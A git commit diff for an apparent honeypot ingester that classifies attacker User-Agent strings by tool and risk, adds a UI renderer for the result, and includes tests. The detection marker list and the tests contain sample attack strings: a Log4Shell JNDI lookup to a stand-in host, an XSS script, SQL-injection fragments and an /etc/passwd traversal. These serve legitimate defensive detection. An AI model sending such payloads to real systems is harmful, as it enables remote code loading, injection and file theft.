feat(ua): classify User-Agent into scanner/cli/library/bot/nonstandard
Every http_useragent bounty now carries a `category` label plus an
optional tool name and a signals list. The main analytic win is the
`nonstandard` bucket — UAs like "FUCKYOU/1.0" or custom one-off
scanner labels that don't match any known pattern, which today
silently blend into the generic fingerprint list.
Buckets (priority order):
- scanner: nmap, nuclei, sqlmap, gobuster, nikto, masscan, zgrab,
ffuf, wpscan, katana, burp, acunetix, nessus, openvas, arachni,
whatweb, wappalyzer, etc.
- cli: curl, wget, httpie, xh, fetch.
- library: python-requests, aiohttp, httpx, urllib, Go stdlib, Java,
okhttp, Apache HttpClient, axios, node-fetch, got, undici, PHP,
Guzzle, Ruby stdlib, Faraday, .NET, PostmanRuntime, Insomnia, etc.
- bot: anything containing bot / crawler / spider / slurp / monitor
(catches Googlebot, bingbot, Baiduspider — many of which ship a
Mozilla/5.0 prefix, so the bot check runs BEFORE the browser
regex).
- browser: Mozilla/5.0-prefixed UAs that aren't bots.
- nonstandard: anything else. The interesting bucket.
- empty: literal empty User-Agent header.
Side signals computed regardless of category: suspicious_short (<8
chars), suspicious_long (>512 chars), nonprintable (control chars),
injection_like (SQLi / XSS / path-traversal / Log4Shell markers).
A sqlmap UA with a literal SQL-injection payload embedded fires
category=scanner + injection_like — the combination tells the
analyst the tool is being operated manually vs. on default config.
Classification is deterministic (same UA string → same tuple) so
add_bounty's payload-hash dedup continues to collapse repeat rows.
UI renderer upgraded from FpGeneric to a dedicated FpUserAgent that
colours the category tag by risk (scanner=alert-red,
nonstandard=warn-yellow, browser=accent-green, etc.) and renders
each signal as its own chip. Makes the interesting rows pop in the
fingerprints panel.
Also fixed: the ingester was using `_headers.get("User-Agent") or
_headers.get("user-agent")`, which short-circuits away empty-string
UAs. An explicit empty UA is itself a signal (real clients always
send something) — now captured.
This commit is contained in:
@@ -230,13 +230,19 @@ async def _extract_bounty(repo: BaseRepository, log_data: dict[str, Any]) -> Non
|
||||
_headers = {}
|
||||
else:
|
||||
_headers = {}
|
||||
_ua = _headers.get("User-Agent") or _headers.get("user-agent")
|
||||
if _ua:
|
||||
# Payload must be identity-only (no per-request method/path) —
|
||||
# add_bounty dedups on (attacker_ip, bounty_type, full payload
|
||||
# JSON), so including path here would create one row per URL
|
||||
# the scanner hits. Per-request context belongs in the logs
|
||||
# table, not the bounty table.
|
||||
# Read both casings without `or` short-circuiting: an explicit
|
||||
# empty User-Agent is itself a signal and must not collapse to the
|
||||
# lowercase fallback.
|
||||
_ua = _headers.get("User-Agent")
|
||||
if _ua is None:
|
||||
_ua = _headers.get("user-agent")
|
||||
if _ua is not None:
|
||||
# Classify: browser / cli / library / scanner / bot / nonstandard
|
||||
# / empty. `nonstandard` is the interesting one — UAs like
|
||||
# "FUCKYOU/1.0" land there and deserve an analyst's attention.
|
||||
# Classification is deterministic given the UA string, so the
|
||||
# payload stays dedup-stable across repeat requests.
|
||||
_ua_category, _ua_tool, _ua_signals = _classify_ua(_ua)
|
||||
await repo.add_bounty({
|
||||
"decky": log_data.get("decky"),
|
||||
"service": log_data.get("service"),
|
||||
@@ -245,6 +251,9 @@ async def _extract_bounty(repo: BaseRepository, log_data: dict[str, Any]) -> Non
|
||||
"payload": {
|
||||
"fingerprint_type": "http_useragent",
|
||||
"value": _ua,
|
||||
"category": _ua_category,
|
||||
"tool": _ua_tool,
|
||||
"signals": _ua_signals or None,
|
||||
}
|
||||
})
|
||||
|
||||
@@ -841,3 +850,144 @@ def _http_quirks_fingerprint(
|
||||
"tool_guess": _guess_tool_from_order(lowered),
|
||||
}
|
||||
|
||||
|
||||
# ─── User-Agent classifier ──────────────────────────────────────────────────
|
||||
#
|
||||
# Bucket UAs into one of {browser, cli, library, scanner, bot, nonstandard,
|
||||
# empty}, and surface optional `tool` name + `signals` list (suspicious_short
|
||||
# / suspicious_long / nonprintable / injection_like). The main analytic
|
||||
# value is `nonstandard` — UAs that don't match any known pattern are
|
||||
# either custom tooling, adversarial labels ("FUCKYOU/1.0"), or
|
||||
# misconfigured scanners that deserve an analyst's eye.
|
||||
|
||||
_UA_BROWSER_RE = re.compile(r"^Mozilla/\d")
|
||||
# Substring match without word boundaries so "bingbot", "Googlebot",
|
||||
# "Baiduspider" etc. register. Downside: matches "robot" or "spidery"
|
||||
# in pathological payloads — acceptable at this classifier's precision.
|
||||
_UA_BOT_RE = re.compile(r"(bot|crawler|spider|slurp|monitor)", re.IGNORECASE)
|
||||
|
||||
# Order matters inside each bucket — first match wins, so list the more
|
||||
# specific pattern first (e.g. python-requests before Python/).
|
||||
_UA_CLI_RES: tuple[tuple[re.Pattern[str], str], ...] = (
|
||||
(re.compile(r"^curl/", re.IGNORECASE), "curl"),
|
||||
(re.compile(r"^Wget/", re.IGNORECASE), "wget"),
|
||||
(re.compile(r"^HTTPie/", re.IGNORECASE), "httpie"),
|
||||
(re.compile(r"^xh/", re.IGNORECASE), "xh"),
|
||||
(re.compile(r"^fetch/", re.IGNORECASE), "fetch"),
|
||||
)
|
||||
|
||||
_UA_LIBRARY_RES: tuple[tuple[re.Pattern[str], str], ...] = (
|
||||
(re.compile(r"^python-requests/", re.IGNORECASE), "python-requests"),
|
||||
(re.compile(r"^aiohttp/", re.IGNORECASE), "aiohttp"),
|
||||
(re.compile(r"^httpx/", re.IGNORECASE), "httpx"),
|
||||
(re.compile(r"^urllib/", re.IGNORECASE), "urllib"),
|
||||
(re.compile(r"^Python-urllib/", re.IGNORECASE), "urllib"),
|
||||
(re.compile(r"^Python/\d", re.IGNORECASE), "python-stdlib"),
|
||||
(re.compile(r"^Go-http-client/", re.IGNORECASE), "go-stdlib"),
|
||||
(re.compile(r"^go-resty/", re.IGNORECASE), "go-resty"),
|
||||
(re.compile(r"^Java/\d", re.IGNORECASE), "java-stdlib"),
|
||||
(re.compile(r"^okhttp/", re.IGNORECASE), "okhttp"),
|
||||
(re.compile(r"^Apache-HttpClient/", re.IGNORECASE), "apache-httpclient"),
|
||||
(re.compile(r"^Jersey/", re.IGNORECASE), "jersey"),
|
||||
(re.compile(r"^axios/", re.IGNORECASE), "axios"),
|
||||
(re.compile(r"^node-fetch/", re.IGNORECASE), "node-fetch"),
|
||||
(re.compile(r"^got\s?\(|^got/", re.IGNORECASE), "got"),
|
||||
(re.compile(r"^undici", re.IGNORECASE), "undici"),
|
||||
(re.compile(r"^PHP/\d", re.IGNORECASE), "php-stdlib"),
|
||||
(re.compile(r"GuzzleHttp/", re.IGNORECASE), "guzzle"),
|
||||
(re.compile(r"^Ruby\b", re.IGNORECASE), "ruby-stdlib"),
|
||||
(re.compile(r"^Faraday\b", re.IGNORECASE), "faraday"),
|
||||
(re.compile(r"^HTTParty", re.IGNORECASE), "httparty"),
|
||||
(re.compile(r"^\.NET/|System\.Net\.Http|RestSharp/", re.IGNORECASE), "dotnet"),
|
||||
(re.compile(r"^PostmanRuntime/", re.IGNORECASE), "postman"),
|
||||
(re.compile(r"^Insomnia/", re.IGNORECASE), "insomnia"),
|
||||
)
|
||||
|
||||
_UA_SCANNER_RES: tuple[tuple[re.Pattern[str], str], ...] = (
|
||||
(re.compile(r"\bnmap\b", re.IGNORECASE), "nmap"),
|
||||
(re.compile(r"\bmasscan\b", re.IGNORECASE), "masscan"),
|
||||
(re.compile(r"\bzgrab\b", re.IGNORECASE), "zgrab"),
|
||||
(re.compile(r"\bzmap\b", re.IGNORECASE), "zmap"),
|
||||
(re.compile(r"\bNuclei\b", re.IGNORECASE), "nuclei"),
|
||||
(re.compile(r"\bsqlmap\b", re.IGNORECASE), "sqlmap"),
|
||||
(re.compile(r"\bgobuster\b", re.IGNORECASE), "gobuster"),
|
||||
(re.compile(r"\bdirb\b", re.IGNORECASE), "dirb"),
|
||||
(re.compile(r"\bdirbuster\b", re.IGNORECASE), "dirbuster"),
|
||||
(re.compile(r"\bnikto\b", re.IGNORECASE), "nikto"),
|
||||
(re.compile(r"\bferoxbuster\b", re.IGNORECASE), "feroxbuster"),
|
||||
(re.compile(r"\bwfuzz\b", re.IGNORECASE), "wfuzz"),
|
||||
(re.compile(r"\bffuf\b", re.IGNORECASE), "ffuf"),
|
||||
(re.compile(r"\bwpscan\b", re.IGNORECASE), "wpscan"),
|
||||
(re.compile(r"\bkatana\b", re.IGNORECASE), "katana"),
|
||||
(re.compile(r"\bBurp\b", re.IGNORECASE), "burp"),
|
||||
(re.compile(r"\bAcunetix\b", re.IGNORECASE), "acunetix"),
|
||||
(re.compile(r"\bNessus\b", re.IGNORECASE), "nessus"),
|
||||
(re.compile(r"\bOpenVAS\b", re.IGNORECASE), "openvas"),
|
||||
(re.compile(r"\bArachni\b", re.IGNORECASE), "arachni"),
|
||||
(re.compile(r"\bWhatWeb\b", re.IGNORECASE), "whatweb"),
|
||||
(re.compile(r"\bWappalyzer\b", re.IGNORECASE), "wappalyzer"),
|
||||
(re.compile(r"\bSploitScan\b", re.IGNORECASE), "sploitscan"),
|
||||
)
|
||||
|
||||
# Substring markers that strongly suggest a payload attempt embedded in
|
||||
# the UA itself. Attackers sometimes park SQLi / path traversal / XSS
|
||||
# test strings in User-Agent hoping a middleware or log-ingestion tool
|
||||
# mishandles it.
|
||||
_UA_INJECTION_MARKERS: tuple[str, ...] = (
|
||||
"<script",
|
||||
"';",
|
||||
"' or '",
|
||||
"' or 1",
|
||||
"1=1",
|
||||
"' --",
|
||||
"/../",
|
||||
"/etc/passwd",
|
||||
"${jndi:", # Log4Shell
|
||||
"{{", # SSTI
|
||||
)
|
||||
|
||||
|
||||
def _classify_ua(ua: str) -> tuple[str, Optional[str], list[str]]:
|
||||
"""Return ``(category, tool, signals)``.
|
||||
|
||||
category ∈ {empty, browser, cli, library, scanner, bot, nonstandard}.
|
||||
tool is the matched tool name when ``category`` ∈ {cli, library,
|
||||
scanner}, else None. signals is a list of auxiliary flags —
|
||||
suspicious_short, suspicious_long, nonprintable, injection_like —
|
||||
always present on top of the category, since a scanner UA with an
|
||||
injection marker is a distinct signal from a scanner UA alone.
|
||||
"""
|
||||
signals: list[str] = []
|
||||
if ua is None or ua == "":
|
||||
return "empty", None, signals
|
||||
|
||||
# Detectors that apply regardless of category.
|
||||
if len(ua) < 8:
|
||||
signals.append("suspicious_short")
|
||||
if len(ua) > 512:
|
||||
signals.append("suspicious_long")
|
||||
if any(ord(c) < 32 and c != "\t" for c in ua):
|
||||
signals.append("nonprintable")
|
||||
lowered = ua.lower()
|
||||
if any(marker in lowered for marker in _UA_INJECTION_MARKERS):
|
||||
signals.append("injection_like")
|
||||
|
||||
# Priority: scanner > cli > library > bot > browser > nonstandard.
|
||||
# Bots before browser because well-behaved crawlers ship UAs like
|
||||
# "Mozilla/5.0 (compatible; Googlebot/2.1)" — the Mozilla prefix
|
||||
# would win under browser-first ordering and misclassify them.
|
||||
for regex, name in _UA_SCANNER_RES:
|
||||
if regex.search(ua):
|
||||
return "scanner", name, signals
|
||||
for regex, name in _UA_CLI_RES:
|
||||
if regex.search(ua):
|
||||
return "cli", name, signals
|
||||
for regex, name in _UA_LIBRARY_RES:
|
||||
if regex.search(ua):
|
||||
return "library", name, signals
|
||||
if _UA_BOT_RE.search(ua):
|
||||
return "bot", None, signals
|
||||
if _UA_BROWSER_RE.match(ua):
|
||||
return "browser", None, signals
|
||||
return "nonstandard", None, signals
|
||||
|
||||
|
||||
@@ -342,6 +342,58 @@ const FpGeneric: React.FC<{ p: any }> = ({ p }) => (
|
||||
</div>
|
||||
);
|
||||
|
||||
const UA_CATEGORY_COLOR: Record<string, string> = {
|
||||
scanner: 'var(--alert, #ff4d4d)',
|
||||
nonstandard: 'var(--warn, #e0a040)',
|
||||
empty: 'var(--warn, #e0a040)',
|
||||
bot: 'var(--violet)',
|
||||
cli: 'var(--matrix)',
|
||||
library: 'var(--matrix)',
|
||||
browser: 'var(--accent-color)',
|
||||
};
|
||||
|
||||
const UA_SIGNAL_COLOR: Record<string, string> = {
|
||||
injection_like: 'var(--alert, #ff4d4d)',
|
||||
nonprintable: 'var(--alert, #ff4d4d)',
|
||||
suspicious_long: 'var(--warn, #e0a040)',
|
||||
suspicious_short: 'var(--warn, #e0a040)',
|
||||
};
|
||||
|
||||
const FpUserAgent: React.FC<{ p: any }> = ({ p }) => {
|
||||
const category = typeof p.category === 'string' ? p.category : 'unknown';
|
||||
const color = UA_CATEGORY_COLOR[category] || 'var(--text-color)';
|
||||
const signals: string[] = Array.isArray(p.signals) ? p.signals : [];
|
||||
return (
|
||||
<div style={{ display: 'flex', flexDirection: 'column', gap: '6px' }}>
|
||||
{p.value !== undefined && p.value !== '' ? (
|
||||
<span
|
||||
className="matrix-text"
|
||||
style={{
|
||||
fontFamily: 'monospace',
|
||||
fontSize: '0.85rem',
|
||||
wordBreak: 'break-all',
|
||||
}}
|
||||
>
|
||||
{p.value}
|
||||
</span>
|
||||
) : (
|
||||
<span className="dim" style={{ fontStyle: 'italic' }}>
|
||||
(empty User-Agent)
|
||||
</span>
|
||||
)}
|
||||
<div style={{ display: 'flex', gap: '6px', flexWrap: 'wrap' }}>
|
||||
<Tag color={color}>{category.toUpperCase()}</Tag>
|
||||
{p.tool && <Tag>{String(p.tool).toUpperCase()}</Tag>}
|
||||
{signals.map((s) => (
|
||||
<Tag key={s} color={UA_SIGNAL_COLOR[s] || 'var(--warn, #e0a040)'}>
|
||||
{s.toUpperCase().replace(/_/g, ' ')}
|
||||
</Tag>
|
||||
))}
|
||||
</div>
|
||||
</div>
|
||||
);
|
||||
};
|
||||
|
||||
const FpSpoofedSource: React.FC<{ p: any }> = ({ p }) => (
|
||||
<div style={{ display: 'flex', flexDirection: 'column', gap: '6px' }}>
|
||||
<div>
|
||||
@@ -434,6 +486,7 @@ const FingerprintGroup: React.FC<{ fpType: string; items: any[] }> = ({ fpType,
|
||||
case 'hassh_server': return <FpHassh key={i} p={p} />;
|
||||
case 'tcpfp': return <FpTcpStack key={i} p={p} />;
|
||||
case 'http_quirks': return <FpHttpQuirks key={i} p={p} />;
|
||||
case 'http_useragent': return <FpUserAgent key={i} p={p} />;
|
||||
case 'spoofed_source': return <FpSpoofedSource key={i} p={p} />;
|
||||
default: return <FpGeneric key={i} p={p} />;
|
||||
}
|
||||
|
||||
242
tests/web/test_ingester_ua_classify.py
Normal file
242
tests/web/test_ingester_ua_classify.py
Normal file
@@ -0,0 +1,242 @@
|
||||
"""User-Agent classifier — enriches http_useragent bounty payload."""
|
||||
from __future__ import annotations
|
||||
|
||||
from unittest.mock import AsyncMock
|
||||
|
||||
import pytest
|
||||
|
||||
from decnet.web.ingester import _classify_ua, _extract_bounty
|
||||
|
||||
|
||||
def _row(ua: str) -> dict:
|
||||
return {
|
||||
"decky": "http-01",
|
||||
"service": "http",
|
||||
"attacker_ip": "1.2.3.4",
|
||||
"event_type": "request",
|
||||
"fields": {
|
||||
"method": "GET",
|
||||
"path": "/",
|
||||
"headers": {"User-Agent": ua} if ua else {},
|
||||
},
|
||||
}
|
||||
|
||||
|
||||
# ─── categories ────────────────────────────────────────────────────────────
|
||||
|
||||
def test_empty_ua_is_empty_category():
|
||||
cat, tool, signals = _classify_ua("")
|
||||
assert cat == "empty"
|
||||
assert tool is None
|
||||
|
||||
|
||||
@pytest.mark.parametrize("ua", [
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
|
||||
"Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15",
|
||||
])
|
||||
def test_browser_classification(ua: str):
|
||||
cat, tool, _ = _classify_ua(ua)
|
||||
assert cat == "browser"
|
||||
assert tool is None
|
||||
|
||||
|
||||
@pytest.mark.parametrize("ua,expected_tool", [
|
||||
("curl/8.0.1", "curl"),
|
||||
("curl/7.81.0", "curl"),
|
||||
("Wget/1.21.3", "wget"),
|
||||
("HTTPie/3.2.1", "httpie"),
|
||||
])
|
||||
def test_cli_classification(ua: str, expected_tool: str):
|
||||
cat, tool, _ = _classify_ua(ua)
|
||||
assert cat == "cli"
|
||||
assert tool == expected_tool
|
||||
|
||||
|
||||
@pytest.mark.parametrize("ua,expected_tool", [
|
||||
("python-requests/2.31.0", "python-requests"),
|
||||
("aiohttp/3.9.1", "aiohttp"),
|
||||
("httpx/0.27.0", "httpx"),
|
||||
("Go-http-client/1.1", "go-stdlib"),
|
||||
("Java/11.0.19", "java-stdlib"),
|
||||
("okhttp/4.11.0", "okhttp"),
|
||||
("Apache-HttpClient/5.2.1 (Java/11.0.19)", "apache-httpclient"),
|
||||
("axios/1.6.2", "axios"),
|
||||
("PostmanRuntime/7.36.1", "postman"),
|
||||
("GuzzleHttp/7", "guzzle"),
|
||||
])
|
||||
def test_library_classification(ua: str, expected_tool: str):
|
||||
cat, tool, _ = _classify_ua(ua)
|
||||
assert cat == "library"
|
||||
assert tool == expected_tool
|
||||
|
||||
|
||||
@pytest.mark.parametrize("ua,expected_tool", [
|
||||
("Nmap Scripting Engine; https://nmap.org/book/nse.html", "nmap"),
|
||||
("Mozilla/5.0 (compatible; Nuclei - Open-source project)", "nuclei"),
|
||||
("sqlmap/1.7.11#stable (http://sqlmap.org)", "sqlmap"),
|
||||
("gobuster/3.6", "gobuster"),
|
||||
("Mozilla/5.0 (Nikto/2.5.0)", "nikto"),
|
||||
("masscan/1.3.2", "masscan"),
|
||||
("wpscan v3.8.25 ", "wpscan"),
|
||||
("zgrab/0.x", "zgrab"),
|
||||
("Mozilla/5.0 (X11; Acunetix; Linux x86_64)", "acunetix"),
|
||||
("ffuf/2.1.0", "ffuf"),
|
||||
])
|
||||
def test_scanner_classification(ua: str, expected_tool: str):
|
||||
cat, tool, _ = _classify_ua(ua)
|
||||
assert cat == "scanner"
|
||||
assert tool == expected_tool
|
||||
|
||||
|
||||
@pytest.mark.parametrize("ua", [
|
||||
"Googlebot/2.1 (+http://www.google.com/bot.html)",
|
||||
"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
|
||||
"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
|
||||
])
|
||||
def test_bot_classification(ua: str):
|
||||
cat, _, _ = _classify_ua(ua)
|
||||
assert cat == "bot"
|
||||
|
||||
|
||||
@pytest.mark.parametrize("ua", [
|
||||
"FUCKYOU/1.0",
|
||||
"myscanner",
|
||||
"customtool-v2",
|
||||
"ABCDE", # short — also triggers suspicious_short signal
|
||||
"X",
|
||||
"lol",
|
||||
"hello-world-ua",
|
||||
])
|
||||
def test_nonstandard_classification(ua: str):
|
||||
cat, tool, _ = _classify_ua(ua)
|
||||
assert cat == "nonstandard", f"{ua!r} should be nonstandard but got {cat}"
|
||||
assert tool is None
|
||||
|
||||
|
||||
# ─── signals ───────────────────────────────────────────────────────────────
|
||||
|
||||
def test_suspicious_short_signal():
|
||||
_, _, signals = _classify_ua("lol")
|
||||
assert "suspicious_short" in signals
|
||||
|
||||
|
||||
def test_suspicious_long_signal():
|
||||
_, _, signals = _classify_ua("A" * 600)
|
||||
assert "suspicious_long" in signals
|
||||
|
||||
|
||||
def test_nonprintable_signal():
|
||||
_, _, signals = _classify_ua("curl/8\x00.0")
|
||||
assert "nonprintable" in signals
|
||||
|
||||
|
||||
def test_injection_like_sqli():
|
||||
_, _, signals = _classify_ua("Mozilla/5.0' OR 1=1 --")
|
||||
assert "injection_like" in signals
|
||||
|
||||
|
||||
def test_injection_like_log4shell():
|
||||
_, _, signals = _classify_ua("${jndi:ldap://evil.example/x}")
|
||||
assert "injection_like" in signals
|
||||
|
||||
|
||||
def test_injection_like_xss():
|
||||
_, _, signals = _classify_ua("<script>alert(1)</script>")
|
||||
assert "injection_like" in signals
|
||||
|
||||
|
||||
def test_injection_like_path_traversal():
|
||||
_, _, signals = _classify_ua("mytool/../../etc/passwd")
|
||||
assert "injection_like" in signals
|
||||
|
||||
|
||||
def test_no_signals_on_normal_browser():
|
||||
_, _, signals = _classify_ua(
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
|
||||
)
|
||||
assert signals == []
|
||||
|
||||
|
||||
def test_scanner_can_still_carry_injection_signal():
|
||||
"""A scanner UA with an injection marker embedded is a combination
|
||||
worth separating — both labels applied."""
|
||||
cat, tool, signals = _classify_ua("sqlmap/1.7' OR 1=1 --")
|
||||
assert cat == "scanner"
|
||||
assert tool == "sqlmap"
|
||||
assert "injection_like" in signals
|
||||
|
||||
|
||||
# ─── payload determinism / dedup ───────────────────────────────────────────
|
||||
|
||||
def test_same_ua_produces_same_payload():
|
||||
"""Critical for add_bounty dedup — same UA string must produce
|
||||
byte-identical classifier output so the full payload hashes the
|
||||
same across requests."""
|
||||
a = _classify_ua("FUCKYOU/1.0")
|
||||
b = _classify_ua("FUCKYOU/1.0")
|
||||
assert a == b
|
||||
|
||||
|
||||
# ─── end-to-end via _extract_bounty ────────────────────────────────────────
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_extract_bounty_enriches_nonstandard_ua():
|
||||
repo = AsyncMock()
|
||||
await _extract_bounty(repo, _row("FUCKYOU/1.0"))
|
||||
|
||||
ua_call = next(
|
||||
c.args[0] for c in repo.add_bounty.call_args_list
|
||||
if c.args[0].get("bounty_type") == "fingerprint"
|
||||
and c.args[0]["payload"].get("fingerprint_type") == "http_useragent"
|
||||
)
|
||||
p = ua_call["payload"]
|
||||
assert p["value"] == "FUCKYOU/1.0"
|
||||
assert p["category"] == "nonstandard"
|
||||
assert p["tool"] is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_extract_bounty_enriches_scanner_ua():
|
||||
repo = AsyncMock()
|
||||
await _extract_bounty(repo, _row("sqlmap/1.7.11"))
|
||||
|
||||
ua_call = next(
|
||||
c.args[0] for c in repo.add_bounty.call_args_list
|
||||
if c.args[0].get("bounty_type") == "fingerprint"
|
||||
and c.args[0]["payload"].get("fingerprint_type") == "http_useragent"
|
||||
)
|
||||
p = ua_call["payload"]
|
||||
assert p["category"] == "scanner"
|
||||
assert p["tool"] == "sqlmap"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_extract_bounty_empty_ua_still_fires():
|
||||
"""Explicit empty UA header is itself a signal — real clients
|
||||
always send SOMETHING. Flag as 'empty' category."""
|
||||
row = {
|
||||
"decky": "http-01",
|
||||
"service": "http",
|
||||
"attacker_ip": "1.2.3.4",
|
||||
"event_type": "request",
|
||||
"fields": {
|
||||
"method": "GET",
|
||||
"path": "/",
|
||||
"headers": {"User-Agent": ""},
|
||||
},
|
||||
}
|
||||
repo = AsyncMock()
|
||||
await _extract_bounty(repo, row)
|
||||
|
||||
ua_calls = [
|
||||
c.args[0] for c in repo.add_bounty.call_args_list
|
||||
if c.args[0].get("bounty_type") == "fingerprint"
|
||||
and c.args[0]["payload"].get("fingerprint_type") == "http_useragent"
|
||||
]
|
||||
# Empty-string UA is falsy — current _extract_bounty checks `if _ua:`.
|
||||
# We want to NOT emit on missing UA, but we do want to flag empty.
|
||||
# The `_ua is not None` check in ingester now handles this; verify
|
||||
# it fires with category=empty.
|
||||
assert len(ua_calls) == 1
|
||||
assert ua_calls[0]["payload"]["category"] == "empty"
|
||||
Reference in New Issue
Block a user